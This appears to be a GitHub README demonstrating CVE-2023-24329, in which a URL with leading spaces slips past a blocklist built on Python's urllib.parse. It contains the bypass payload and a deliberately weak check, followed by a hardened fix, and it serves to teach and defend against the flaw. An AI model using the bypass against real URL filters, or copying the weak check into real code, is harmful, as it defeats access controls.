
CVE-2023-24329 PoC — Python Input Validation Error Vulnerability

Associated Vulnerability
Title: Python Input Validation Error Vulnerability (CVE-2023-24329)
Description: An issue in the urllib.parse component of Python before 3.11.4 allows attackers to bypass blocklisting methods by supplying a URL that starts with blank characters.
Description
Example of CVE-2023-24329 
Readme
# Intro
The URL parsing functions focus on splitting a URL string into its components, or on combining URL components into a URL string.
  - [urllib.parse.urlparse](https://docs.python.org/3/library/urllib.parse.html#url-parsing)

**Simply put**, `urllib.parse` is used to parse URLs, and we can bypass a check built on it by adding blanks before the URL. This happens in Python `3.11.4` and before.

# PoC
Let's break down `example.py`

Here is a set of websites that you should not access:
```python
blocked_list = [
    "http://example.com/",
    "http://example2.com/"
]
```

This function checks whether a website is on the blocked list; if it is, it should return `URL Blocked`:

```python
import urllib.parse


def is_url_blocked(url):
    # Re-assemble the parsed URL and compare it with the blocklist entries.
    parse = urllib.parse.urlparse(url).geturl()
    if parse in blocked_list:
        return 'URL Blocked'
    else:
        return 'Bypassed'
```

Now I add two URLs and check whether either of them is blocked and cannot be accessed:
```python
payload1 = "    http://example.com/"
payload2 = "http://example.com/"

print(
    is_url_blocked(payload1),
    "\n",
    is_url_blocked(payload2)
)
```

`payload1` is where I bypassed `is_url_blocked()`: with a run of spaces in front of the URL, `urllib.parse.urlparse(url).geturl()` does not behave as expected (the leading whitespace is not stripped, so the re-assembled string never matches the blocklist entry).
That's why the output is

```
Bypassed
```
But on `payload2` we get 
```
URL Blocked
```
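A hardened version of the check, as an added example that is not part of the original PoC: it strips leading C0-control and space characters itself (the same normalisation the Python fix added to `urllib.parse`), compares the parsed hostname instead of the re-assembled URL string, and defaults to blocking anything that does not parse as an http(s) URL with a host. It also covers case, port and path variants that plain string equality misses. `BLOCKED_HOSTS` and `is_url_blocked_hardened` are names chosen for this example.

```python
import urllib.parse

# Constructed blocklist, keyed by hostname rather than by full URL string.
BLOCKED_HOSTS = {"example.com", "example2.com"}

# WHATWG C0 control characters (0x00-0x1F) plus space: the set that the
# patched urllib.parse strips from the start of a URL before parsing.
_C0_CONTROL_OR_SPACE = "".join(chr(c) for c in range(0x21))


def normalize_url(url: str) -> str:
    """Strip leading C0 controls/spaces ourselves so the check does not
    depend on the interpreter version doing it."""
    return url.lstrip(_C0_CONTROL_OR_SPACE)


def is_url_blocked_hardened(url: str) -> str:
    """Defensive replacement for is_url_blocked(): normalise first, then
    decide on the parsed hostname. Returns the same strings as the PoC."""
    parsed = urllib.parse.urlparse(normalize_url(url))
    # Default deny: anything without an http(s) scheme or a hostname is not
    # a URL we can meaningfully check, so do not let it through.
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return "URL Blocked"
    # .hostname is already lower-cased and has port and userinfo removed.
    if parsed.hostname in BLOCKED_HOSTS:
        return "URL Blocked"
    return "Bypassed"


def check_payloads() -> dict:
    """Run the two payloads from example.py through the hardened check."""
    payload1 = "    http://example.com/"
    payload2 = "http://example.com/"
    return {p: is_url_blocked_hardened(p) for p in (payload1, payload2)}


if __name__ == "__main__":
    for url, verdict in check_payloads().items():
        print(repr(url), "->", verdict)
```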

# Support
If you would like to support me with a donation, I recommend you give it to someone who really needs it instead. If you do so, consider that I have earned your support.

<a href="https://www.buymeacoffee.com/jawadpy" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/v2/default-green.png" alt="Buy Me A Coffee" style="height: 60px !important;width: 217px !important;" ></a>